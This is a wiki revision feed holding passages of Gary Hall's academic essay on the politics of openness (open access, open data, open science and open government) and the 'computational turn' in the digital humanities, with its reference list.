[http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘Google awarded $1 million to professors doing digital humanities research’] (P. Cohen, 2010). 
To what extent is the take-up of practical techniques and approaches from computer science providing some areas of the humanities with a means of defending (and refreshing) themselves in an era of global economic crisis and severe cuts to higher education, through the transformation of their knowledge and learning into quantities of information – so-called ‘deliverables’? Can we even position the ‘computational turn’ as an event created to justify such a move on the part of certain elements within the humanities ([http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/ Frabetti], 2010)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Where does all this leave us as far as this Living Book on open science is concerned? As the argument above hopefully demonstrates, it is clearly not enough just to attempt to reveal or recover the scientific truth about, say, the environment, to counter the disinformation of others involved in the likes of the Climategate controversy. Nor is it enough merely to make the scientific research openly accessible to the public. Equally, it is not satisfactory simply to make the information, data, and associated tools, techniques and resources freely available to those in the humanities, so they can collectively and collaboratively search, mine, map, graph, model, visualize, analyse and interpret it in new ways – including some that may make it less abstract and easier for the majority of those in society to understand and follow – and, in doing so, help bridge the gap between the ‘two cultures’. It is not so much that there is a lack of information, or access to the right kind of information, or information presented in the right kind of way to ensure that the message of the scientific research and data comes across effectively and efficiently. It is not even that there is too much information, too much white noise, as ‘Bifo’ et al. call it (2009: 141-142). To be sure, as a [http://oxygen.mintel.com/sinatra/reports/display/id=479774 2010 Mintel report] showed – to stay with the example of climate change – most people in the UK already know what is happening to the environment. They are just suffering from Green Fatigue: they are bored with thinking about it and are enacting a backlash against what they perceive as ‘extreme’ pressure from environmentalist groups. This is perhaps one reason why [http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html ‘the number of cars on UK roads has risen from just over 26 million in 2005 to more than 31 million in 2009’] (Shields, 2010: 30). Yet to argue there is too much information rather risks implying that there is a proper amount of information – and what would that be?&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; So we might not want to go along with Gilles Deleuze and Felix Guattari when they contend that ‘we do not lack communication. On the contrary, we have too much of it’. But we might nevertheless agree with them when they argue that what we actually lack is creation: ‘We lack resistance to the present’ (1994: 108). In this respect, it is not just a case of supplying more scientific research and data; nor of making the research and data that has otherwise been closed, hidden, denied or suppressed openly available for free – by opening the already existing memory and databanks to the people, for example (which is what Lyotard ended by suggesting we do). 
It is also a case of creating work around the research and data that does not simply go along with the shift in the status and nature of knowledge that is currently taking place. As we have seen, it is a shift toward STEM subjects and away from the humanities; toward a concern with optimizing the social system’s performance in instrumental, functional terms, and away from a concern with questions of what is just and right; and toward an emphasis on openness, freedom and transparency, and away from what is capable of disrupting and disturbing society, and what, in remaining resistant to a culture of measurement and calculation, maintains a much needed element of inaccessibility, inefficiency, delay, error, antagonism, heterogeneity and dissensus within the system. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Can this Living Book on open science be considered one such a creation? And can this series of Living Books about Life be considered another? Are they instances of a resistance to the present? Or just more white noise? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (The above is based on a paper presented at the Data Landscapes, AHRC network event, held in conjunction with the British Antarctic Survey at the University of Westminster, London, December 15, 2010. An earlier version of some of the material provided above appeared in Hall [2010]) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''References''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Arthur, C. (2010), ‘Will Brussels Curb Google Guys’, ''The Guardian'', December 6. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; 'Bifo' Berardi, F., Jacquemet, M. and Vitali, G. (2009), ''Ethereal Shadows: Communications and Power in Contemporary Italy''. Brooklyn, New York: Autonomedia. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Bergman, M. K. (2001), ‘The Deep Web: Surfacing Hidden Value’, ''JEP: The Journal of Electronic Publishing'', vol.7, no.1, August. http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104.&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Birchall, C. (2011) 'There's Been Too Much Secrecy in this City&amp;quot;: The False Choice Between Secrecy and Transparency in US Politics,' ''Cultural Politics''&amp;amp;nbsp;7(1), March: 133-156.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Birchall, C (2011b forthcoming) ‘Transparency, Interrupted: Secrets of the Left’, Between Transparency and Secrecy', Annual Review, ''Theory, Culture and Society, ''December.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Blair, T. (2010), ''A Journey''. London: Hutchinson. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clinton, H. (2010), ‘Internet Freedom: The Prepared Text of U.S. of Secretary of State Hillary Rodham Clinton's speech, delivered at the Newseum in Washington, D.C., January 21. http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, D. (2010), ‘Searching for the Victorians’, ''Dan Cohen'', October 4. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, P. (2010) ‘Digital Keys for Unlocking the Humanities’ Riches’, ''The New York Times'', November 16. http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;amp;hp=&amp;amp;amp;pagewanted=all. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Croxall, B. 
(2010) response to Tanner Higgen, ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. September 10. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1988) ''A Thousand Plateaus: Capitalism and Schizophrenia''. London: Athlone. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1994), ''What is Philosophy?''. New York: Columbia University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fung, A., Graham, M., Weil, D. (2007), ''Full Disclosure: The Perils and Promise of Transparency''. Cambridge: Cambridge University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Frabetti, F. (2010) ‘Digital Again? The Humanities Between the Computational Turn and Originary Technicity’, talk given to the Open Media Group, Coventry School of Art and Design. November 9. http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Franklin, K. D. and Rodriguez’G, K. (2008) ‘The Next Big Thing in Humanities, Arts and Social Science Computing: Cultural Analytics’,''HPC Wire''. July 29. http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gibbs, R. (2010), Presidential press secretary, cited in ‘White House condemns WikiLeaks' release’, ''MCNBC.com News'', November 28. http://www.msnbc.msn.com/id/40405589/ns/us_news-security. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010a), ‘Open Data: Empowering the Empowered or Effective Data Use for Everyone?’, ''Gurstein’s Community Infomatics'', September, 2. http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010b), ‘Open Data (2): Effective Data Use’, ''Gurstein’s Community Infomatics'', September, 9. http://gurstein.wordpress.com/2010/09/09/open-data-2-effective-data-use/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2011), ‘Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide’, posting to the nettime mailing list, July, 5. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hall, G. (2010), 'We Can Know It For You: The Secret Life of Metadata', ''How We Became Metadata''. London: Institute for Modern and Contemporary Culture, University of Westminster. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Higgen, T. (2010) ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. May 25. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hindman, M. (2009), ''The Myth of Digital Democracy''. Princeton, NJ and Oxford: Princeton University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hoffman, M. (2010), ‘EFF Posts Documents Detailing Law Enforcement Collection of Data From Social Media Sites’, ''Electronic Frontier Foundation''. March 16. http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Houghton, J. (2009) ‘Open Access - What are the Economic Benefits?: A Comparison of the United Kingdom, Netherlands and Denmark’, Centre for Strategic Economic Studies, Victoria University, Melbourne. 
http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Jarvis, J. (2010), ‘Time For Citizens of the Internet to Stand Up’, ''The Guardian: MediaGuardian'', March 29. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; JISC (2009), ‘Press Release: Open Science - the future for research?, posting to the BOAI list, November 16. 2009. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Kerssens, N. and Dekker A. (2009), ‘Interview with Lev Manovich for Archive 2020’, ''Virtueel_ Platform''. http://www.virtueelplatform.nl/#2595. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Knouf, N. (2010), ‘The JJPS Extension: Presenting Academic Performance Information’, ''Journal of Journal Performance Studies'', Vol 1, No 1. Available at http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6. Accessed 20 June, 2010. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Latour, B (2004), ‘Why Has Critique Run Out of Steam? From Matters of Fact to Matters of Concern”’, ''Critical Inquiry'', Vol. 30, Number 2. http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Liu, A. (2011) ‘Where is Cultural Criticism in the Digital Humanities’. Paper presented at the panel on ‘The History and Future of the Digital Humanities’” Modern Language Association convention, Los Angeles, January 7. http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J-F. (1986), ''The Postmodern Condition: A Report on Knowledge''. Manchester: Manchester University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1991) ''The Inhuman: Reflections on Time''. Cambridge: Polity. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2010a) ‘Cultural Analytics Lectures by Manovich in UK (London and Swansea), March 8-9, 2010’, ''Software Studies Initiative''. March 8. http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2011) ‘Trending: The Promises and the Challenges of Big Social Data’,''Lev Manovich'', April 28: http://www.manovich.net/DOCS/Manovich_trending_paper.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meeks, E. (2010), ‘The Digital Humanities as Imagined Community’, ''Digital Humanities Specialist''. September 14. https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mintel report, ‘Energy Efficiency in the Home - UK - July 2010’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Murray, S. Choi, S., Hoey, J., Kendall, C., Maskalyk, J., and Palepu, A. (2008), ‘Open Science, Open Access and Open Source Software at ''Open Medicine''’, ''Open Medicine'', 2(1): e1–e3. http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/?tool=pmcentrez http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Patterson, M. (2009), ‘Article-Level Metrics at PloS – Addition of Usage Data’, ''PLoS: Public Library of Science''. September 16. http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Pubget (2010), ‘[BOAI] PLoS Launches Fast (Open) PDF Access with Pubget’, posted on the BOAI list by Peter Suber, March 8. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Poynder, R. 
(2010), ‘Interview With Jean-Claude Bradley: The Impact of Open Notebook Science’, ''Information Today'', September. http://www.infotoday.com/IT/sep10/Poynder.shtml. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2008), ‘Sunset for Ideology, Sunrise for Methodology?’, ''Found History'', March 13. http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010a) ‘Where’s the Beef?: Does Digital Humanities Have to Answer Questions?’, ''Found History'', March 13. http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010b) response to Dan Cohen, ‘Searching for the Victorians’, ''Dan Cohen''. October 5. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Shields, R. (2010), ‘Green Fatigue Hits Campaign to Reduce Carbon Footprint’, ''The Independent'', October 10. http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Sterling, B. (2005), ''Shaping Things''. Massachussetts: MIT. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stolberg, S. G. (2009), ‘On First Day, Obama Quickly Sets a New Tone’”, ''The New York Times''. January 21. http://www.nytimes.com/2009/01/22/us/politics/22obama.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swan, A. (2009), ‘Open Access and Open Data’, ''2nd NERC Data Management Workshop'', Oxford. February 17-18. http://eprints.ecs.soton.ac.uk/17424/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swartz, A. (2010), ‘When is Transparency Useful?’ ''Aaron Swartz’s Raw Thought blog'', February 11. http://www.aaronsw.com/weblog/usefultransparency. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Vaidhyanathan, S. (2009), ‘The Googlization of Universities’, ''The NEA 2009 Almanac of Higher Education''. http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wark, M. (2004), ''A Hacker Manifesto''. Harvard: Harvard University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Westcott, S. (2009) ‘Global Warming: Brits Deny Humans are to Blame,’ ''The Express'', December 7. http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The White House (2009), ‘Memorandum for the Heads of Executive Departments and Agencies: Transparency and Open Government’. January 21. http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wollen, P. and Cooke, L. eds (1995), ''Visual Display: Culture Beyond Appearances''. Seattle: Bay Press.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5502</id>
		<title>Open science/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5502"/>
		<updated>2013-11-03T14:54:49Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me Back to the book] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= '''White Noise: On the Limits of Openness (Living Book Mix)'''  =&lt;br /&gt;
&lt;br /&gt;
= Gary Hall  =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;PH54cp2ggFk&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the explicit aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from (in this case) ''computer science'' and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being used to produce new ways of approaching and understanding texts in the humanities; what is sometimes thought of as ‘the digital humanities’. The concern in the main has been with either digitizing ‘born analog’ humanities texts and artifacts (e.g. making annotated editions of the art and writing of [http://www.blakearchive.org/blake/ William Blake] available to scholars and researchers online), or gathering together ‘born digital’ humanities texts and artifacts (videos, websites, games, photography, sound recordings, 3D data), and then taking complex and often extremely large-scale data analysis techniques from computing science and related fields and applying them to these humanities texts and artifacts - to this ‘big data’, as it has been called. Witness Lev Manovich and the Software Studies Initiative’s use of ‘[http://www.manovich.net/DOCS/Manovich_trending_paper.pdf digital image analysis and new visualization techniques]’ to study ‘20,000 pages of Science and Popular Science magazines… published between 1872-1922, 780 paintings by van Gogh, 4535 covers of Time magazine (1923-2009) and one million manga pages’ (Manovich, 2011), and Dan Cohen and Fred Gibb’s text mining of ‘[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader the 1,681,161 books that were published in English in the UK in the long nineteenth century]’ (Cohen, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; ''What Digitize Me, Visualize Me, Search Me'' endeavours to show is that such data-focused transformations in research can be seen as part of a major alteration in the status and nature of knowledge. It is an alteration that, according to the philosopher Jean-François Lyotard, has been taking place since at least the 1950s, and involves nothing less than a shift away from a concern with questions of what is right and just, and toward a concern with legitimating power by optimizing the social system’s performance in instrumental, functional terms. This shift has significant consequences for our idea of knowledge. Indeed, for Lyotard: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The nature of knowledge cannot survive unchanged within this context of general transformation. It can fit into the new channels, and become operational, only if learning is translated into quantities of information. We can predict that anything in the constituted body of knowledge that is not translatable in this way will be abandoned and that the direction of new research will be dictated by the possibility of its eventual results being translatable into computer language. The ‘producers’ and users of knowledge must now, and will have to, possess the means of translating into these language whatever they want to invent or learn. Research on translating machines is already well advanced. Along with the hegemony of computers comes a certain logic, and therefore a certain set of prescriptions determining which statements are accepted as ‘knowledge’ statements. (1986: 4)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In particular, ''Digitize Me, Visualize Me, Search Me'' suggests that the turn in the humanities toward data-driven scholarship, science visualization, statistical data analysis, etc. can be placed alongside all those discourses that are being put forward at the moment - in both the academy and society - in the name of greater openness, transparency, efficiency and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Access ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The open access movement provides a case in point. Witness [http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf John Houghton’s] 2009 comparison of the benefits of OA for the United Kingdom, Netherlands and Denmark, which claims to show that the open access academic publishing model, in which peer reviewed scholarly research and publications are made available for free online to all those who are able to access the Internet, is actually the most cost effective mechanism for scholarly publishing. Others meanwhile have detailed the increases open access publishing enables in the amount of material that can be published, searched and stored, in the number of people who can access it, in the impact of that material, the range of its distribution, and in the speed and ease of reporting and information retrieval. The following announcement, posted on the BOAI (Budapest Open Access Initiative) list in March 2010, is fairly typical in this respect: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Today PLoS released Pubget links across its journal sites. Now, when users are browsing thousands of reference citations on PLoS journals they will be able to get to the full text article faster than ever before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Specifically, when readers encounter citations to articles as recorded by CrossRef (which are accessed via the ‘CrossRef’ link in the ‘Cited in’ section of any article’s Metrics tab), a PDF icon will also appear if it is freely available via Pubget. Clicking on the icon will take you directly to the PDF. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; On launching this new functionality, Pete Binfield, Publisher of PLoS ONE and the Community Journals said: ‘Any service, like Pubget, that makes it easier for authors to quickly find the information they need is a welcome addition to our articles. We like how Pubget helps to break down content walls in science, letting users get instantly to the article-level detail that they seek.’ (Pubget, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Data ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet it is not just the research literature that is positioned as being rendered more accessible by scientists. Even the data created in the course of scientific research is promoted as being made freely and openly available for others to use, analyse and build upon.This includes data sets that are too large to be included in any resulting peer-reviewed publications. Known as open data, or data-sharing, this initiative is motivated by the idea that publishing data online on an open basis bestows it with a [http://eprints.ecs.soton.ac.uk/17424/1/Swan_-_NERC_09.pptx ‘vastly increased utility’]. Digital data sets are said to be ‘easily passed around’; they are seemingly ‘more easily reused’, reanalysed and checked for accuracy and validity; and they supposedly contain more ‘opportunities for educational and commercial exploitation’ (Swan, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, certain academic publishers are already viewing the linking of their journals to the underlying data as another of the ‘value-added’ services they can offer, to set alongside automatic alerting and sophisticated citation, indexing, searching and linking facilities (and to no doubt help ward off the threat of disintermediation posed by the development of digital technology, which enables academics to take over the means of dissemination and publish their work for and by themselves cheaply and easily). Significantly, a [http://www.jisc.ac.uk/publications/documents/opensciencerpt.aspx 2009 JISC report] also identified ‘open-ness, predictive science based on massive data volumes and citizen involvement as [all] being important features of tomorrow’s research practice’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a further move in this direction, all Public Library of Science (PLoS) journals are now providing a broad range of article-level metrics and indicators relating to usage data on an open basis. No longer withheld as trade secrets, these metrics reveal which articles are attracting the most views, citations from the scholarly literature, social bookmarks, coverage in the media, comments, responses, ‘star’ ratings, blog coverage, and so on. PLoS has positioned this programme as enabling science scholars to assess [http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/ ‘research articles on their own merits rather than on the basis of the journal (and its impact factor) where the work happens to be published’], and they encourage readers to carry out their own analyses of this open data (Patterson, 2009). Yet it is difficult not to perceive such article-level metrics and management tools as also being part of the wider process of transforming knowledge and learning into ‘quantities of information’ (Lyotard, 1986: 4); quantities, furthermore, that are produced more to be exchanged, marketed and sold (1986: 4) – for example, by individual academics to their departments, institutions, funders and governments in the form of indicators of ‘quality’ and ‘impact’ (1986: 5). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''From Open Science to Open Government ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such developments around open access and open data are themselves part of the larger trend or phenomenon that is coming to be known as ‘open science’. As Murray et al put it: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Open science is emerging as a collaborative and transparent approach to research. It is the idea that all data (both published and unpublished) should be freely available, and that private interests should not stymie its use by means of copyright, intellectual property rights and patents. It also embraces open access publishing and open source software… (Murray et al, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting and well known examples of how such open science may work is provided by the Open Notebook Science of the organic chemist Jean-Claude Bradley. ‘[I]in the interests of openness’, Bradley is making the [http://www.infotoday.com/IT/sep10/Poynder.shtml ‘details of every experiment done in his lab freely available on the web']. This ‘includes all the data generated from these experiments too, even the failed experiments’. What is more, he is doing so in ‘real time’, ‘within hours of production, not after the months or years involved in peer review’ (Poynder, 2010). Again, we can see how emphasis is being placed on the amount of research that can be shared, and the speed with which this can be achieved. This openness on Bradley’s part is also positioned as a means of achieving usefulness and impact, as is evident from the very title of one of his Open Notebook Science projects, [http://usefulchem.wikispaces.com/ UsefulChem]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To be fair, however, such discourses around openness, transparency, efficiency and utility are not confined to the sciences – or even the university, for that matter. There are also wider political initiatives, dubbed ‘Open Government’, or ‘Government 2.0’, with both the Labour and the Conservative/Liberal Democrat coalition administrations in the UK making a great display of freeing government information. The Labour government implemented the Freedom of Information (FOI) Act in 2000, and then proceeded to launch a [http://www.data.gov.uk website] expressly dedicated to the release of governmental data sets in January 2010. It is a website that the current Conservative/Liberal Democrat coalition government continues to make extensive use of. In a similar vein, the [http://www.freeourdata.org.uk/ Guardian] newspaper has campaigned for the UK government to relinquish its copyright on all local, regional and national data collected with taxpayers’ money and to make such data freely and openly available to the public by publishing it online, where it can be collectively and collaboratively scrutinized, searched, mined, mapped, graphed, cross-tabulated, visualized, audited and interpreted using software tools. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Nor is this phenomenon confined to the UK. In the United States Barack Obama promised throughout his election campaign to make government more open. He followed this up by issuing a memorandum on transparency the very first day after he became President, vowing to make openness one of [http://www.nytimes.com/2009/01/22/us/politics/22obama.html ‘the touchstones of this presidency’”] (Obama, cited in Stolberg, 2009): ‘[http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ My Administration] is committed to creating an unprecedented level of openness in Government. We will work together to ensure the public trust and establish a system of transparency, public participation, and collaboration. Openness will strengthen our democracy and promote efficiency and effectiveness in Government’ (The White House, 2009). 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''The Politics of Openness''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The connection I am making here between the movements for open access, open data, open science and open government is one that has to a certain extent already been pointed to by Michael Gurstein in his reflections on the experience of attending the 2011 conference of the [http://okfn.org/ Open Knowledge Foundation]. For Gurstein: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ the ‘open data/open government’ movement] begins from a profoundly political perspective that government is largely ineffective and inefficient (and possibly corrupt) and that it hides that ineffectiveness and inefficiency (and possible corruption) from public scrutiny through lack of transparency in its operations and particularly in denying to the public access to information (data) about its operations. And further that this access once available would give citizens the means to hold bureaucrats (and their political masters) accountable for their actions. In doing so it would give these self-same citizens a platform on which to undertake (or at least collaborate with) these bureaucrats in certain key and significant activities—planning, analyzing, budgeting that sort of thing. Moreover through the implementation of processes of crowdsourcing this would also provide the bureaucrats with the overwhelming benefits of having access to and input from the knowledge and wisdom of the broader interested public. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Put in somewhat different terms but with essentially the same meaning—it’s the taxpayer’s money and they have the right to participate in overseeing how it is spent. Having “open” access to government’s data/information gives citizens the tools to exercise that right. (Gurstein, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, for Gurstein, a much clearer understanding is needed than has been displayed by many open data/open government advocates to date of what exactly is meant by openness, and of where arguments in favour of open access, open information and open data are likely to lead us in the not too distant future. With this in mind, we could endeavour to put some flesh on the bones of Gurstein’s sketch of the politics of openness and suggest that, from a liberal perspective, freeing publicly funded and acquired information and data – whether it is gathered directly in the process of census collection, or indirectly as part of other activities (crime, healthcare, transport, schools and accident statistics) – is seen as helping society to perform more efficiently. For liberals, openness is said to play a key role in increasing citizen trust, participation and involvement in democracy, and indeed government, as access to information – such as that needed to intervene in public policy – is no longer restricted either to the state or to those corporations, institutions, organizations and individuals who have sufficient money and power to acquire it for themselves. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such liberal beliefs find support in the idea that making information and data freely and transparently available goes along with Article 19 of The Universal Declaration of Human Rights. The latter states that everyone has the right [http://www.un.org/en/documents/udhr/index.shtml ‘to seek, receive and impart information and ideas through any media and regardless of frontiers’]. Hillary Clinton, the United States Secretary of State, put forward a similar vision when, at the beginning of 2010, she said of her country that ‘[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full We stand for a single internet] where all of humanity has equal access to knowledge and ideas’, and against the authoritarian censorship and suppression of free speech and online search facilities like Google in countries such as China and Iran. Clinton declared: 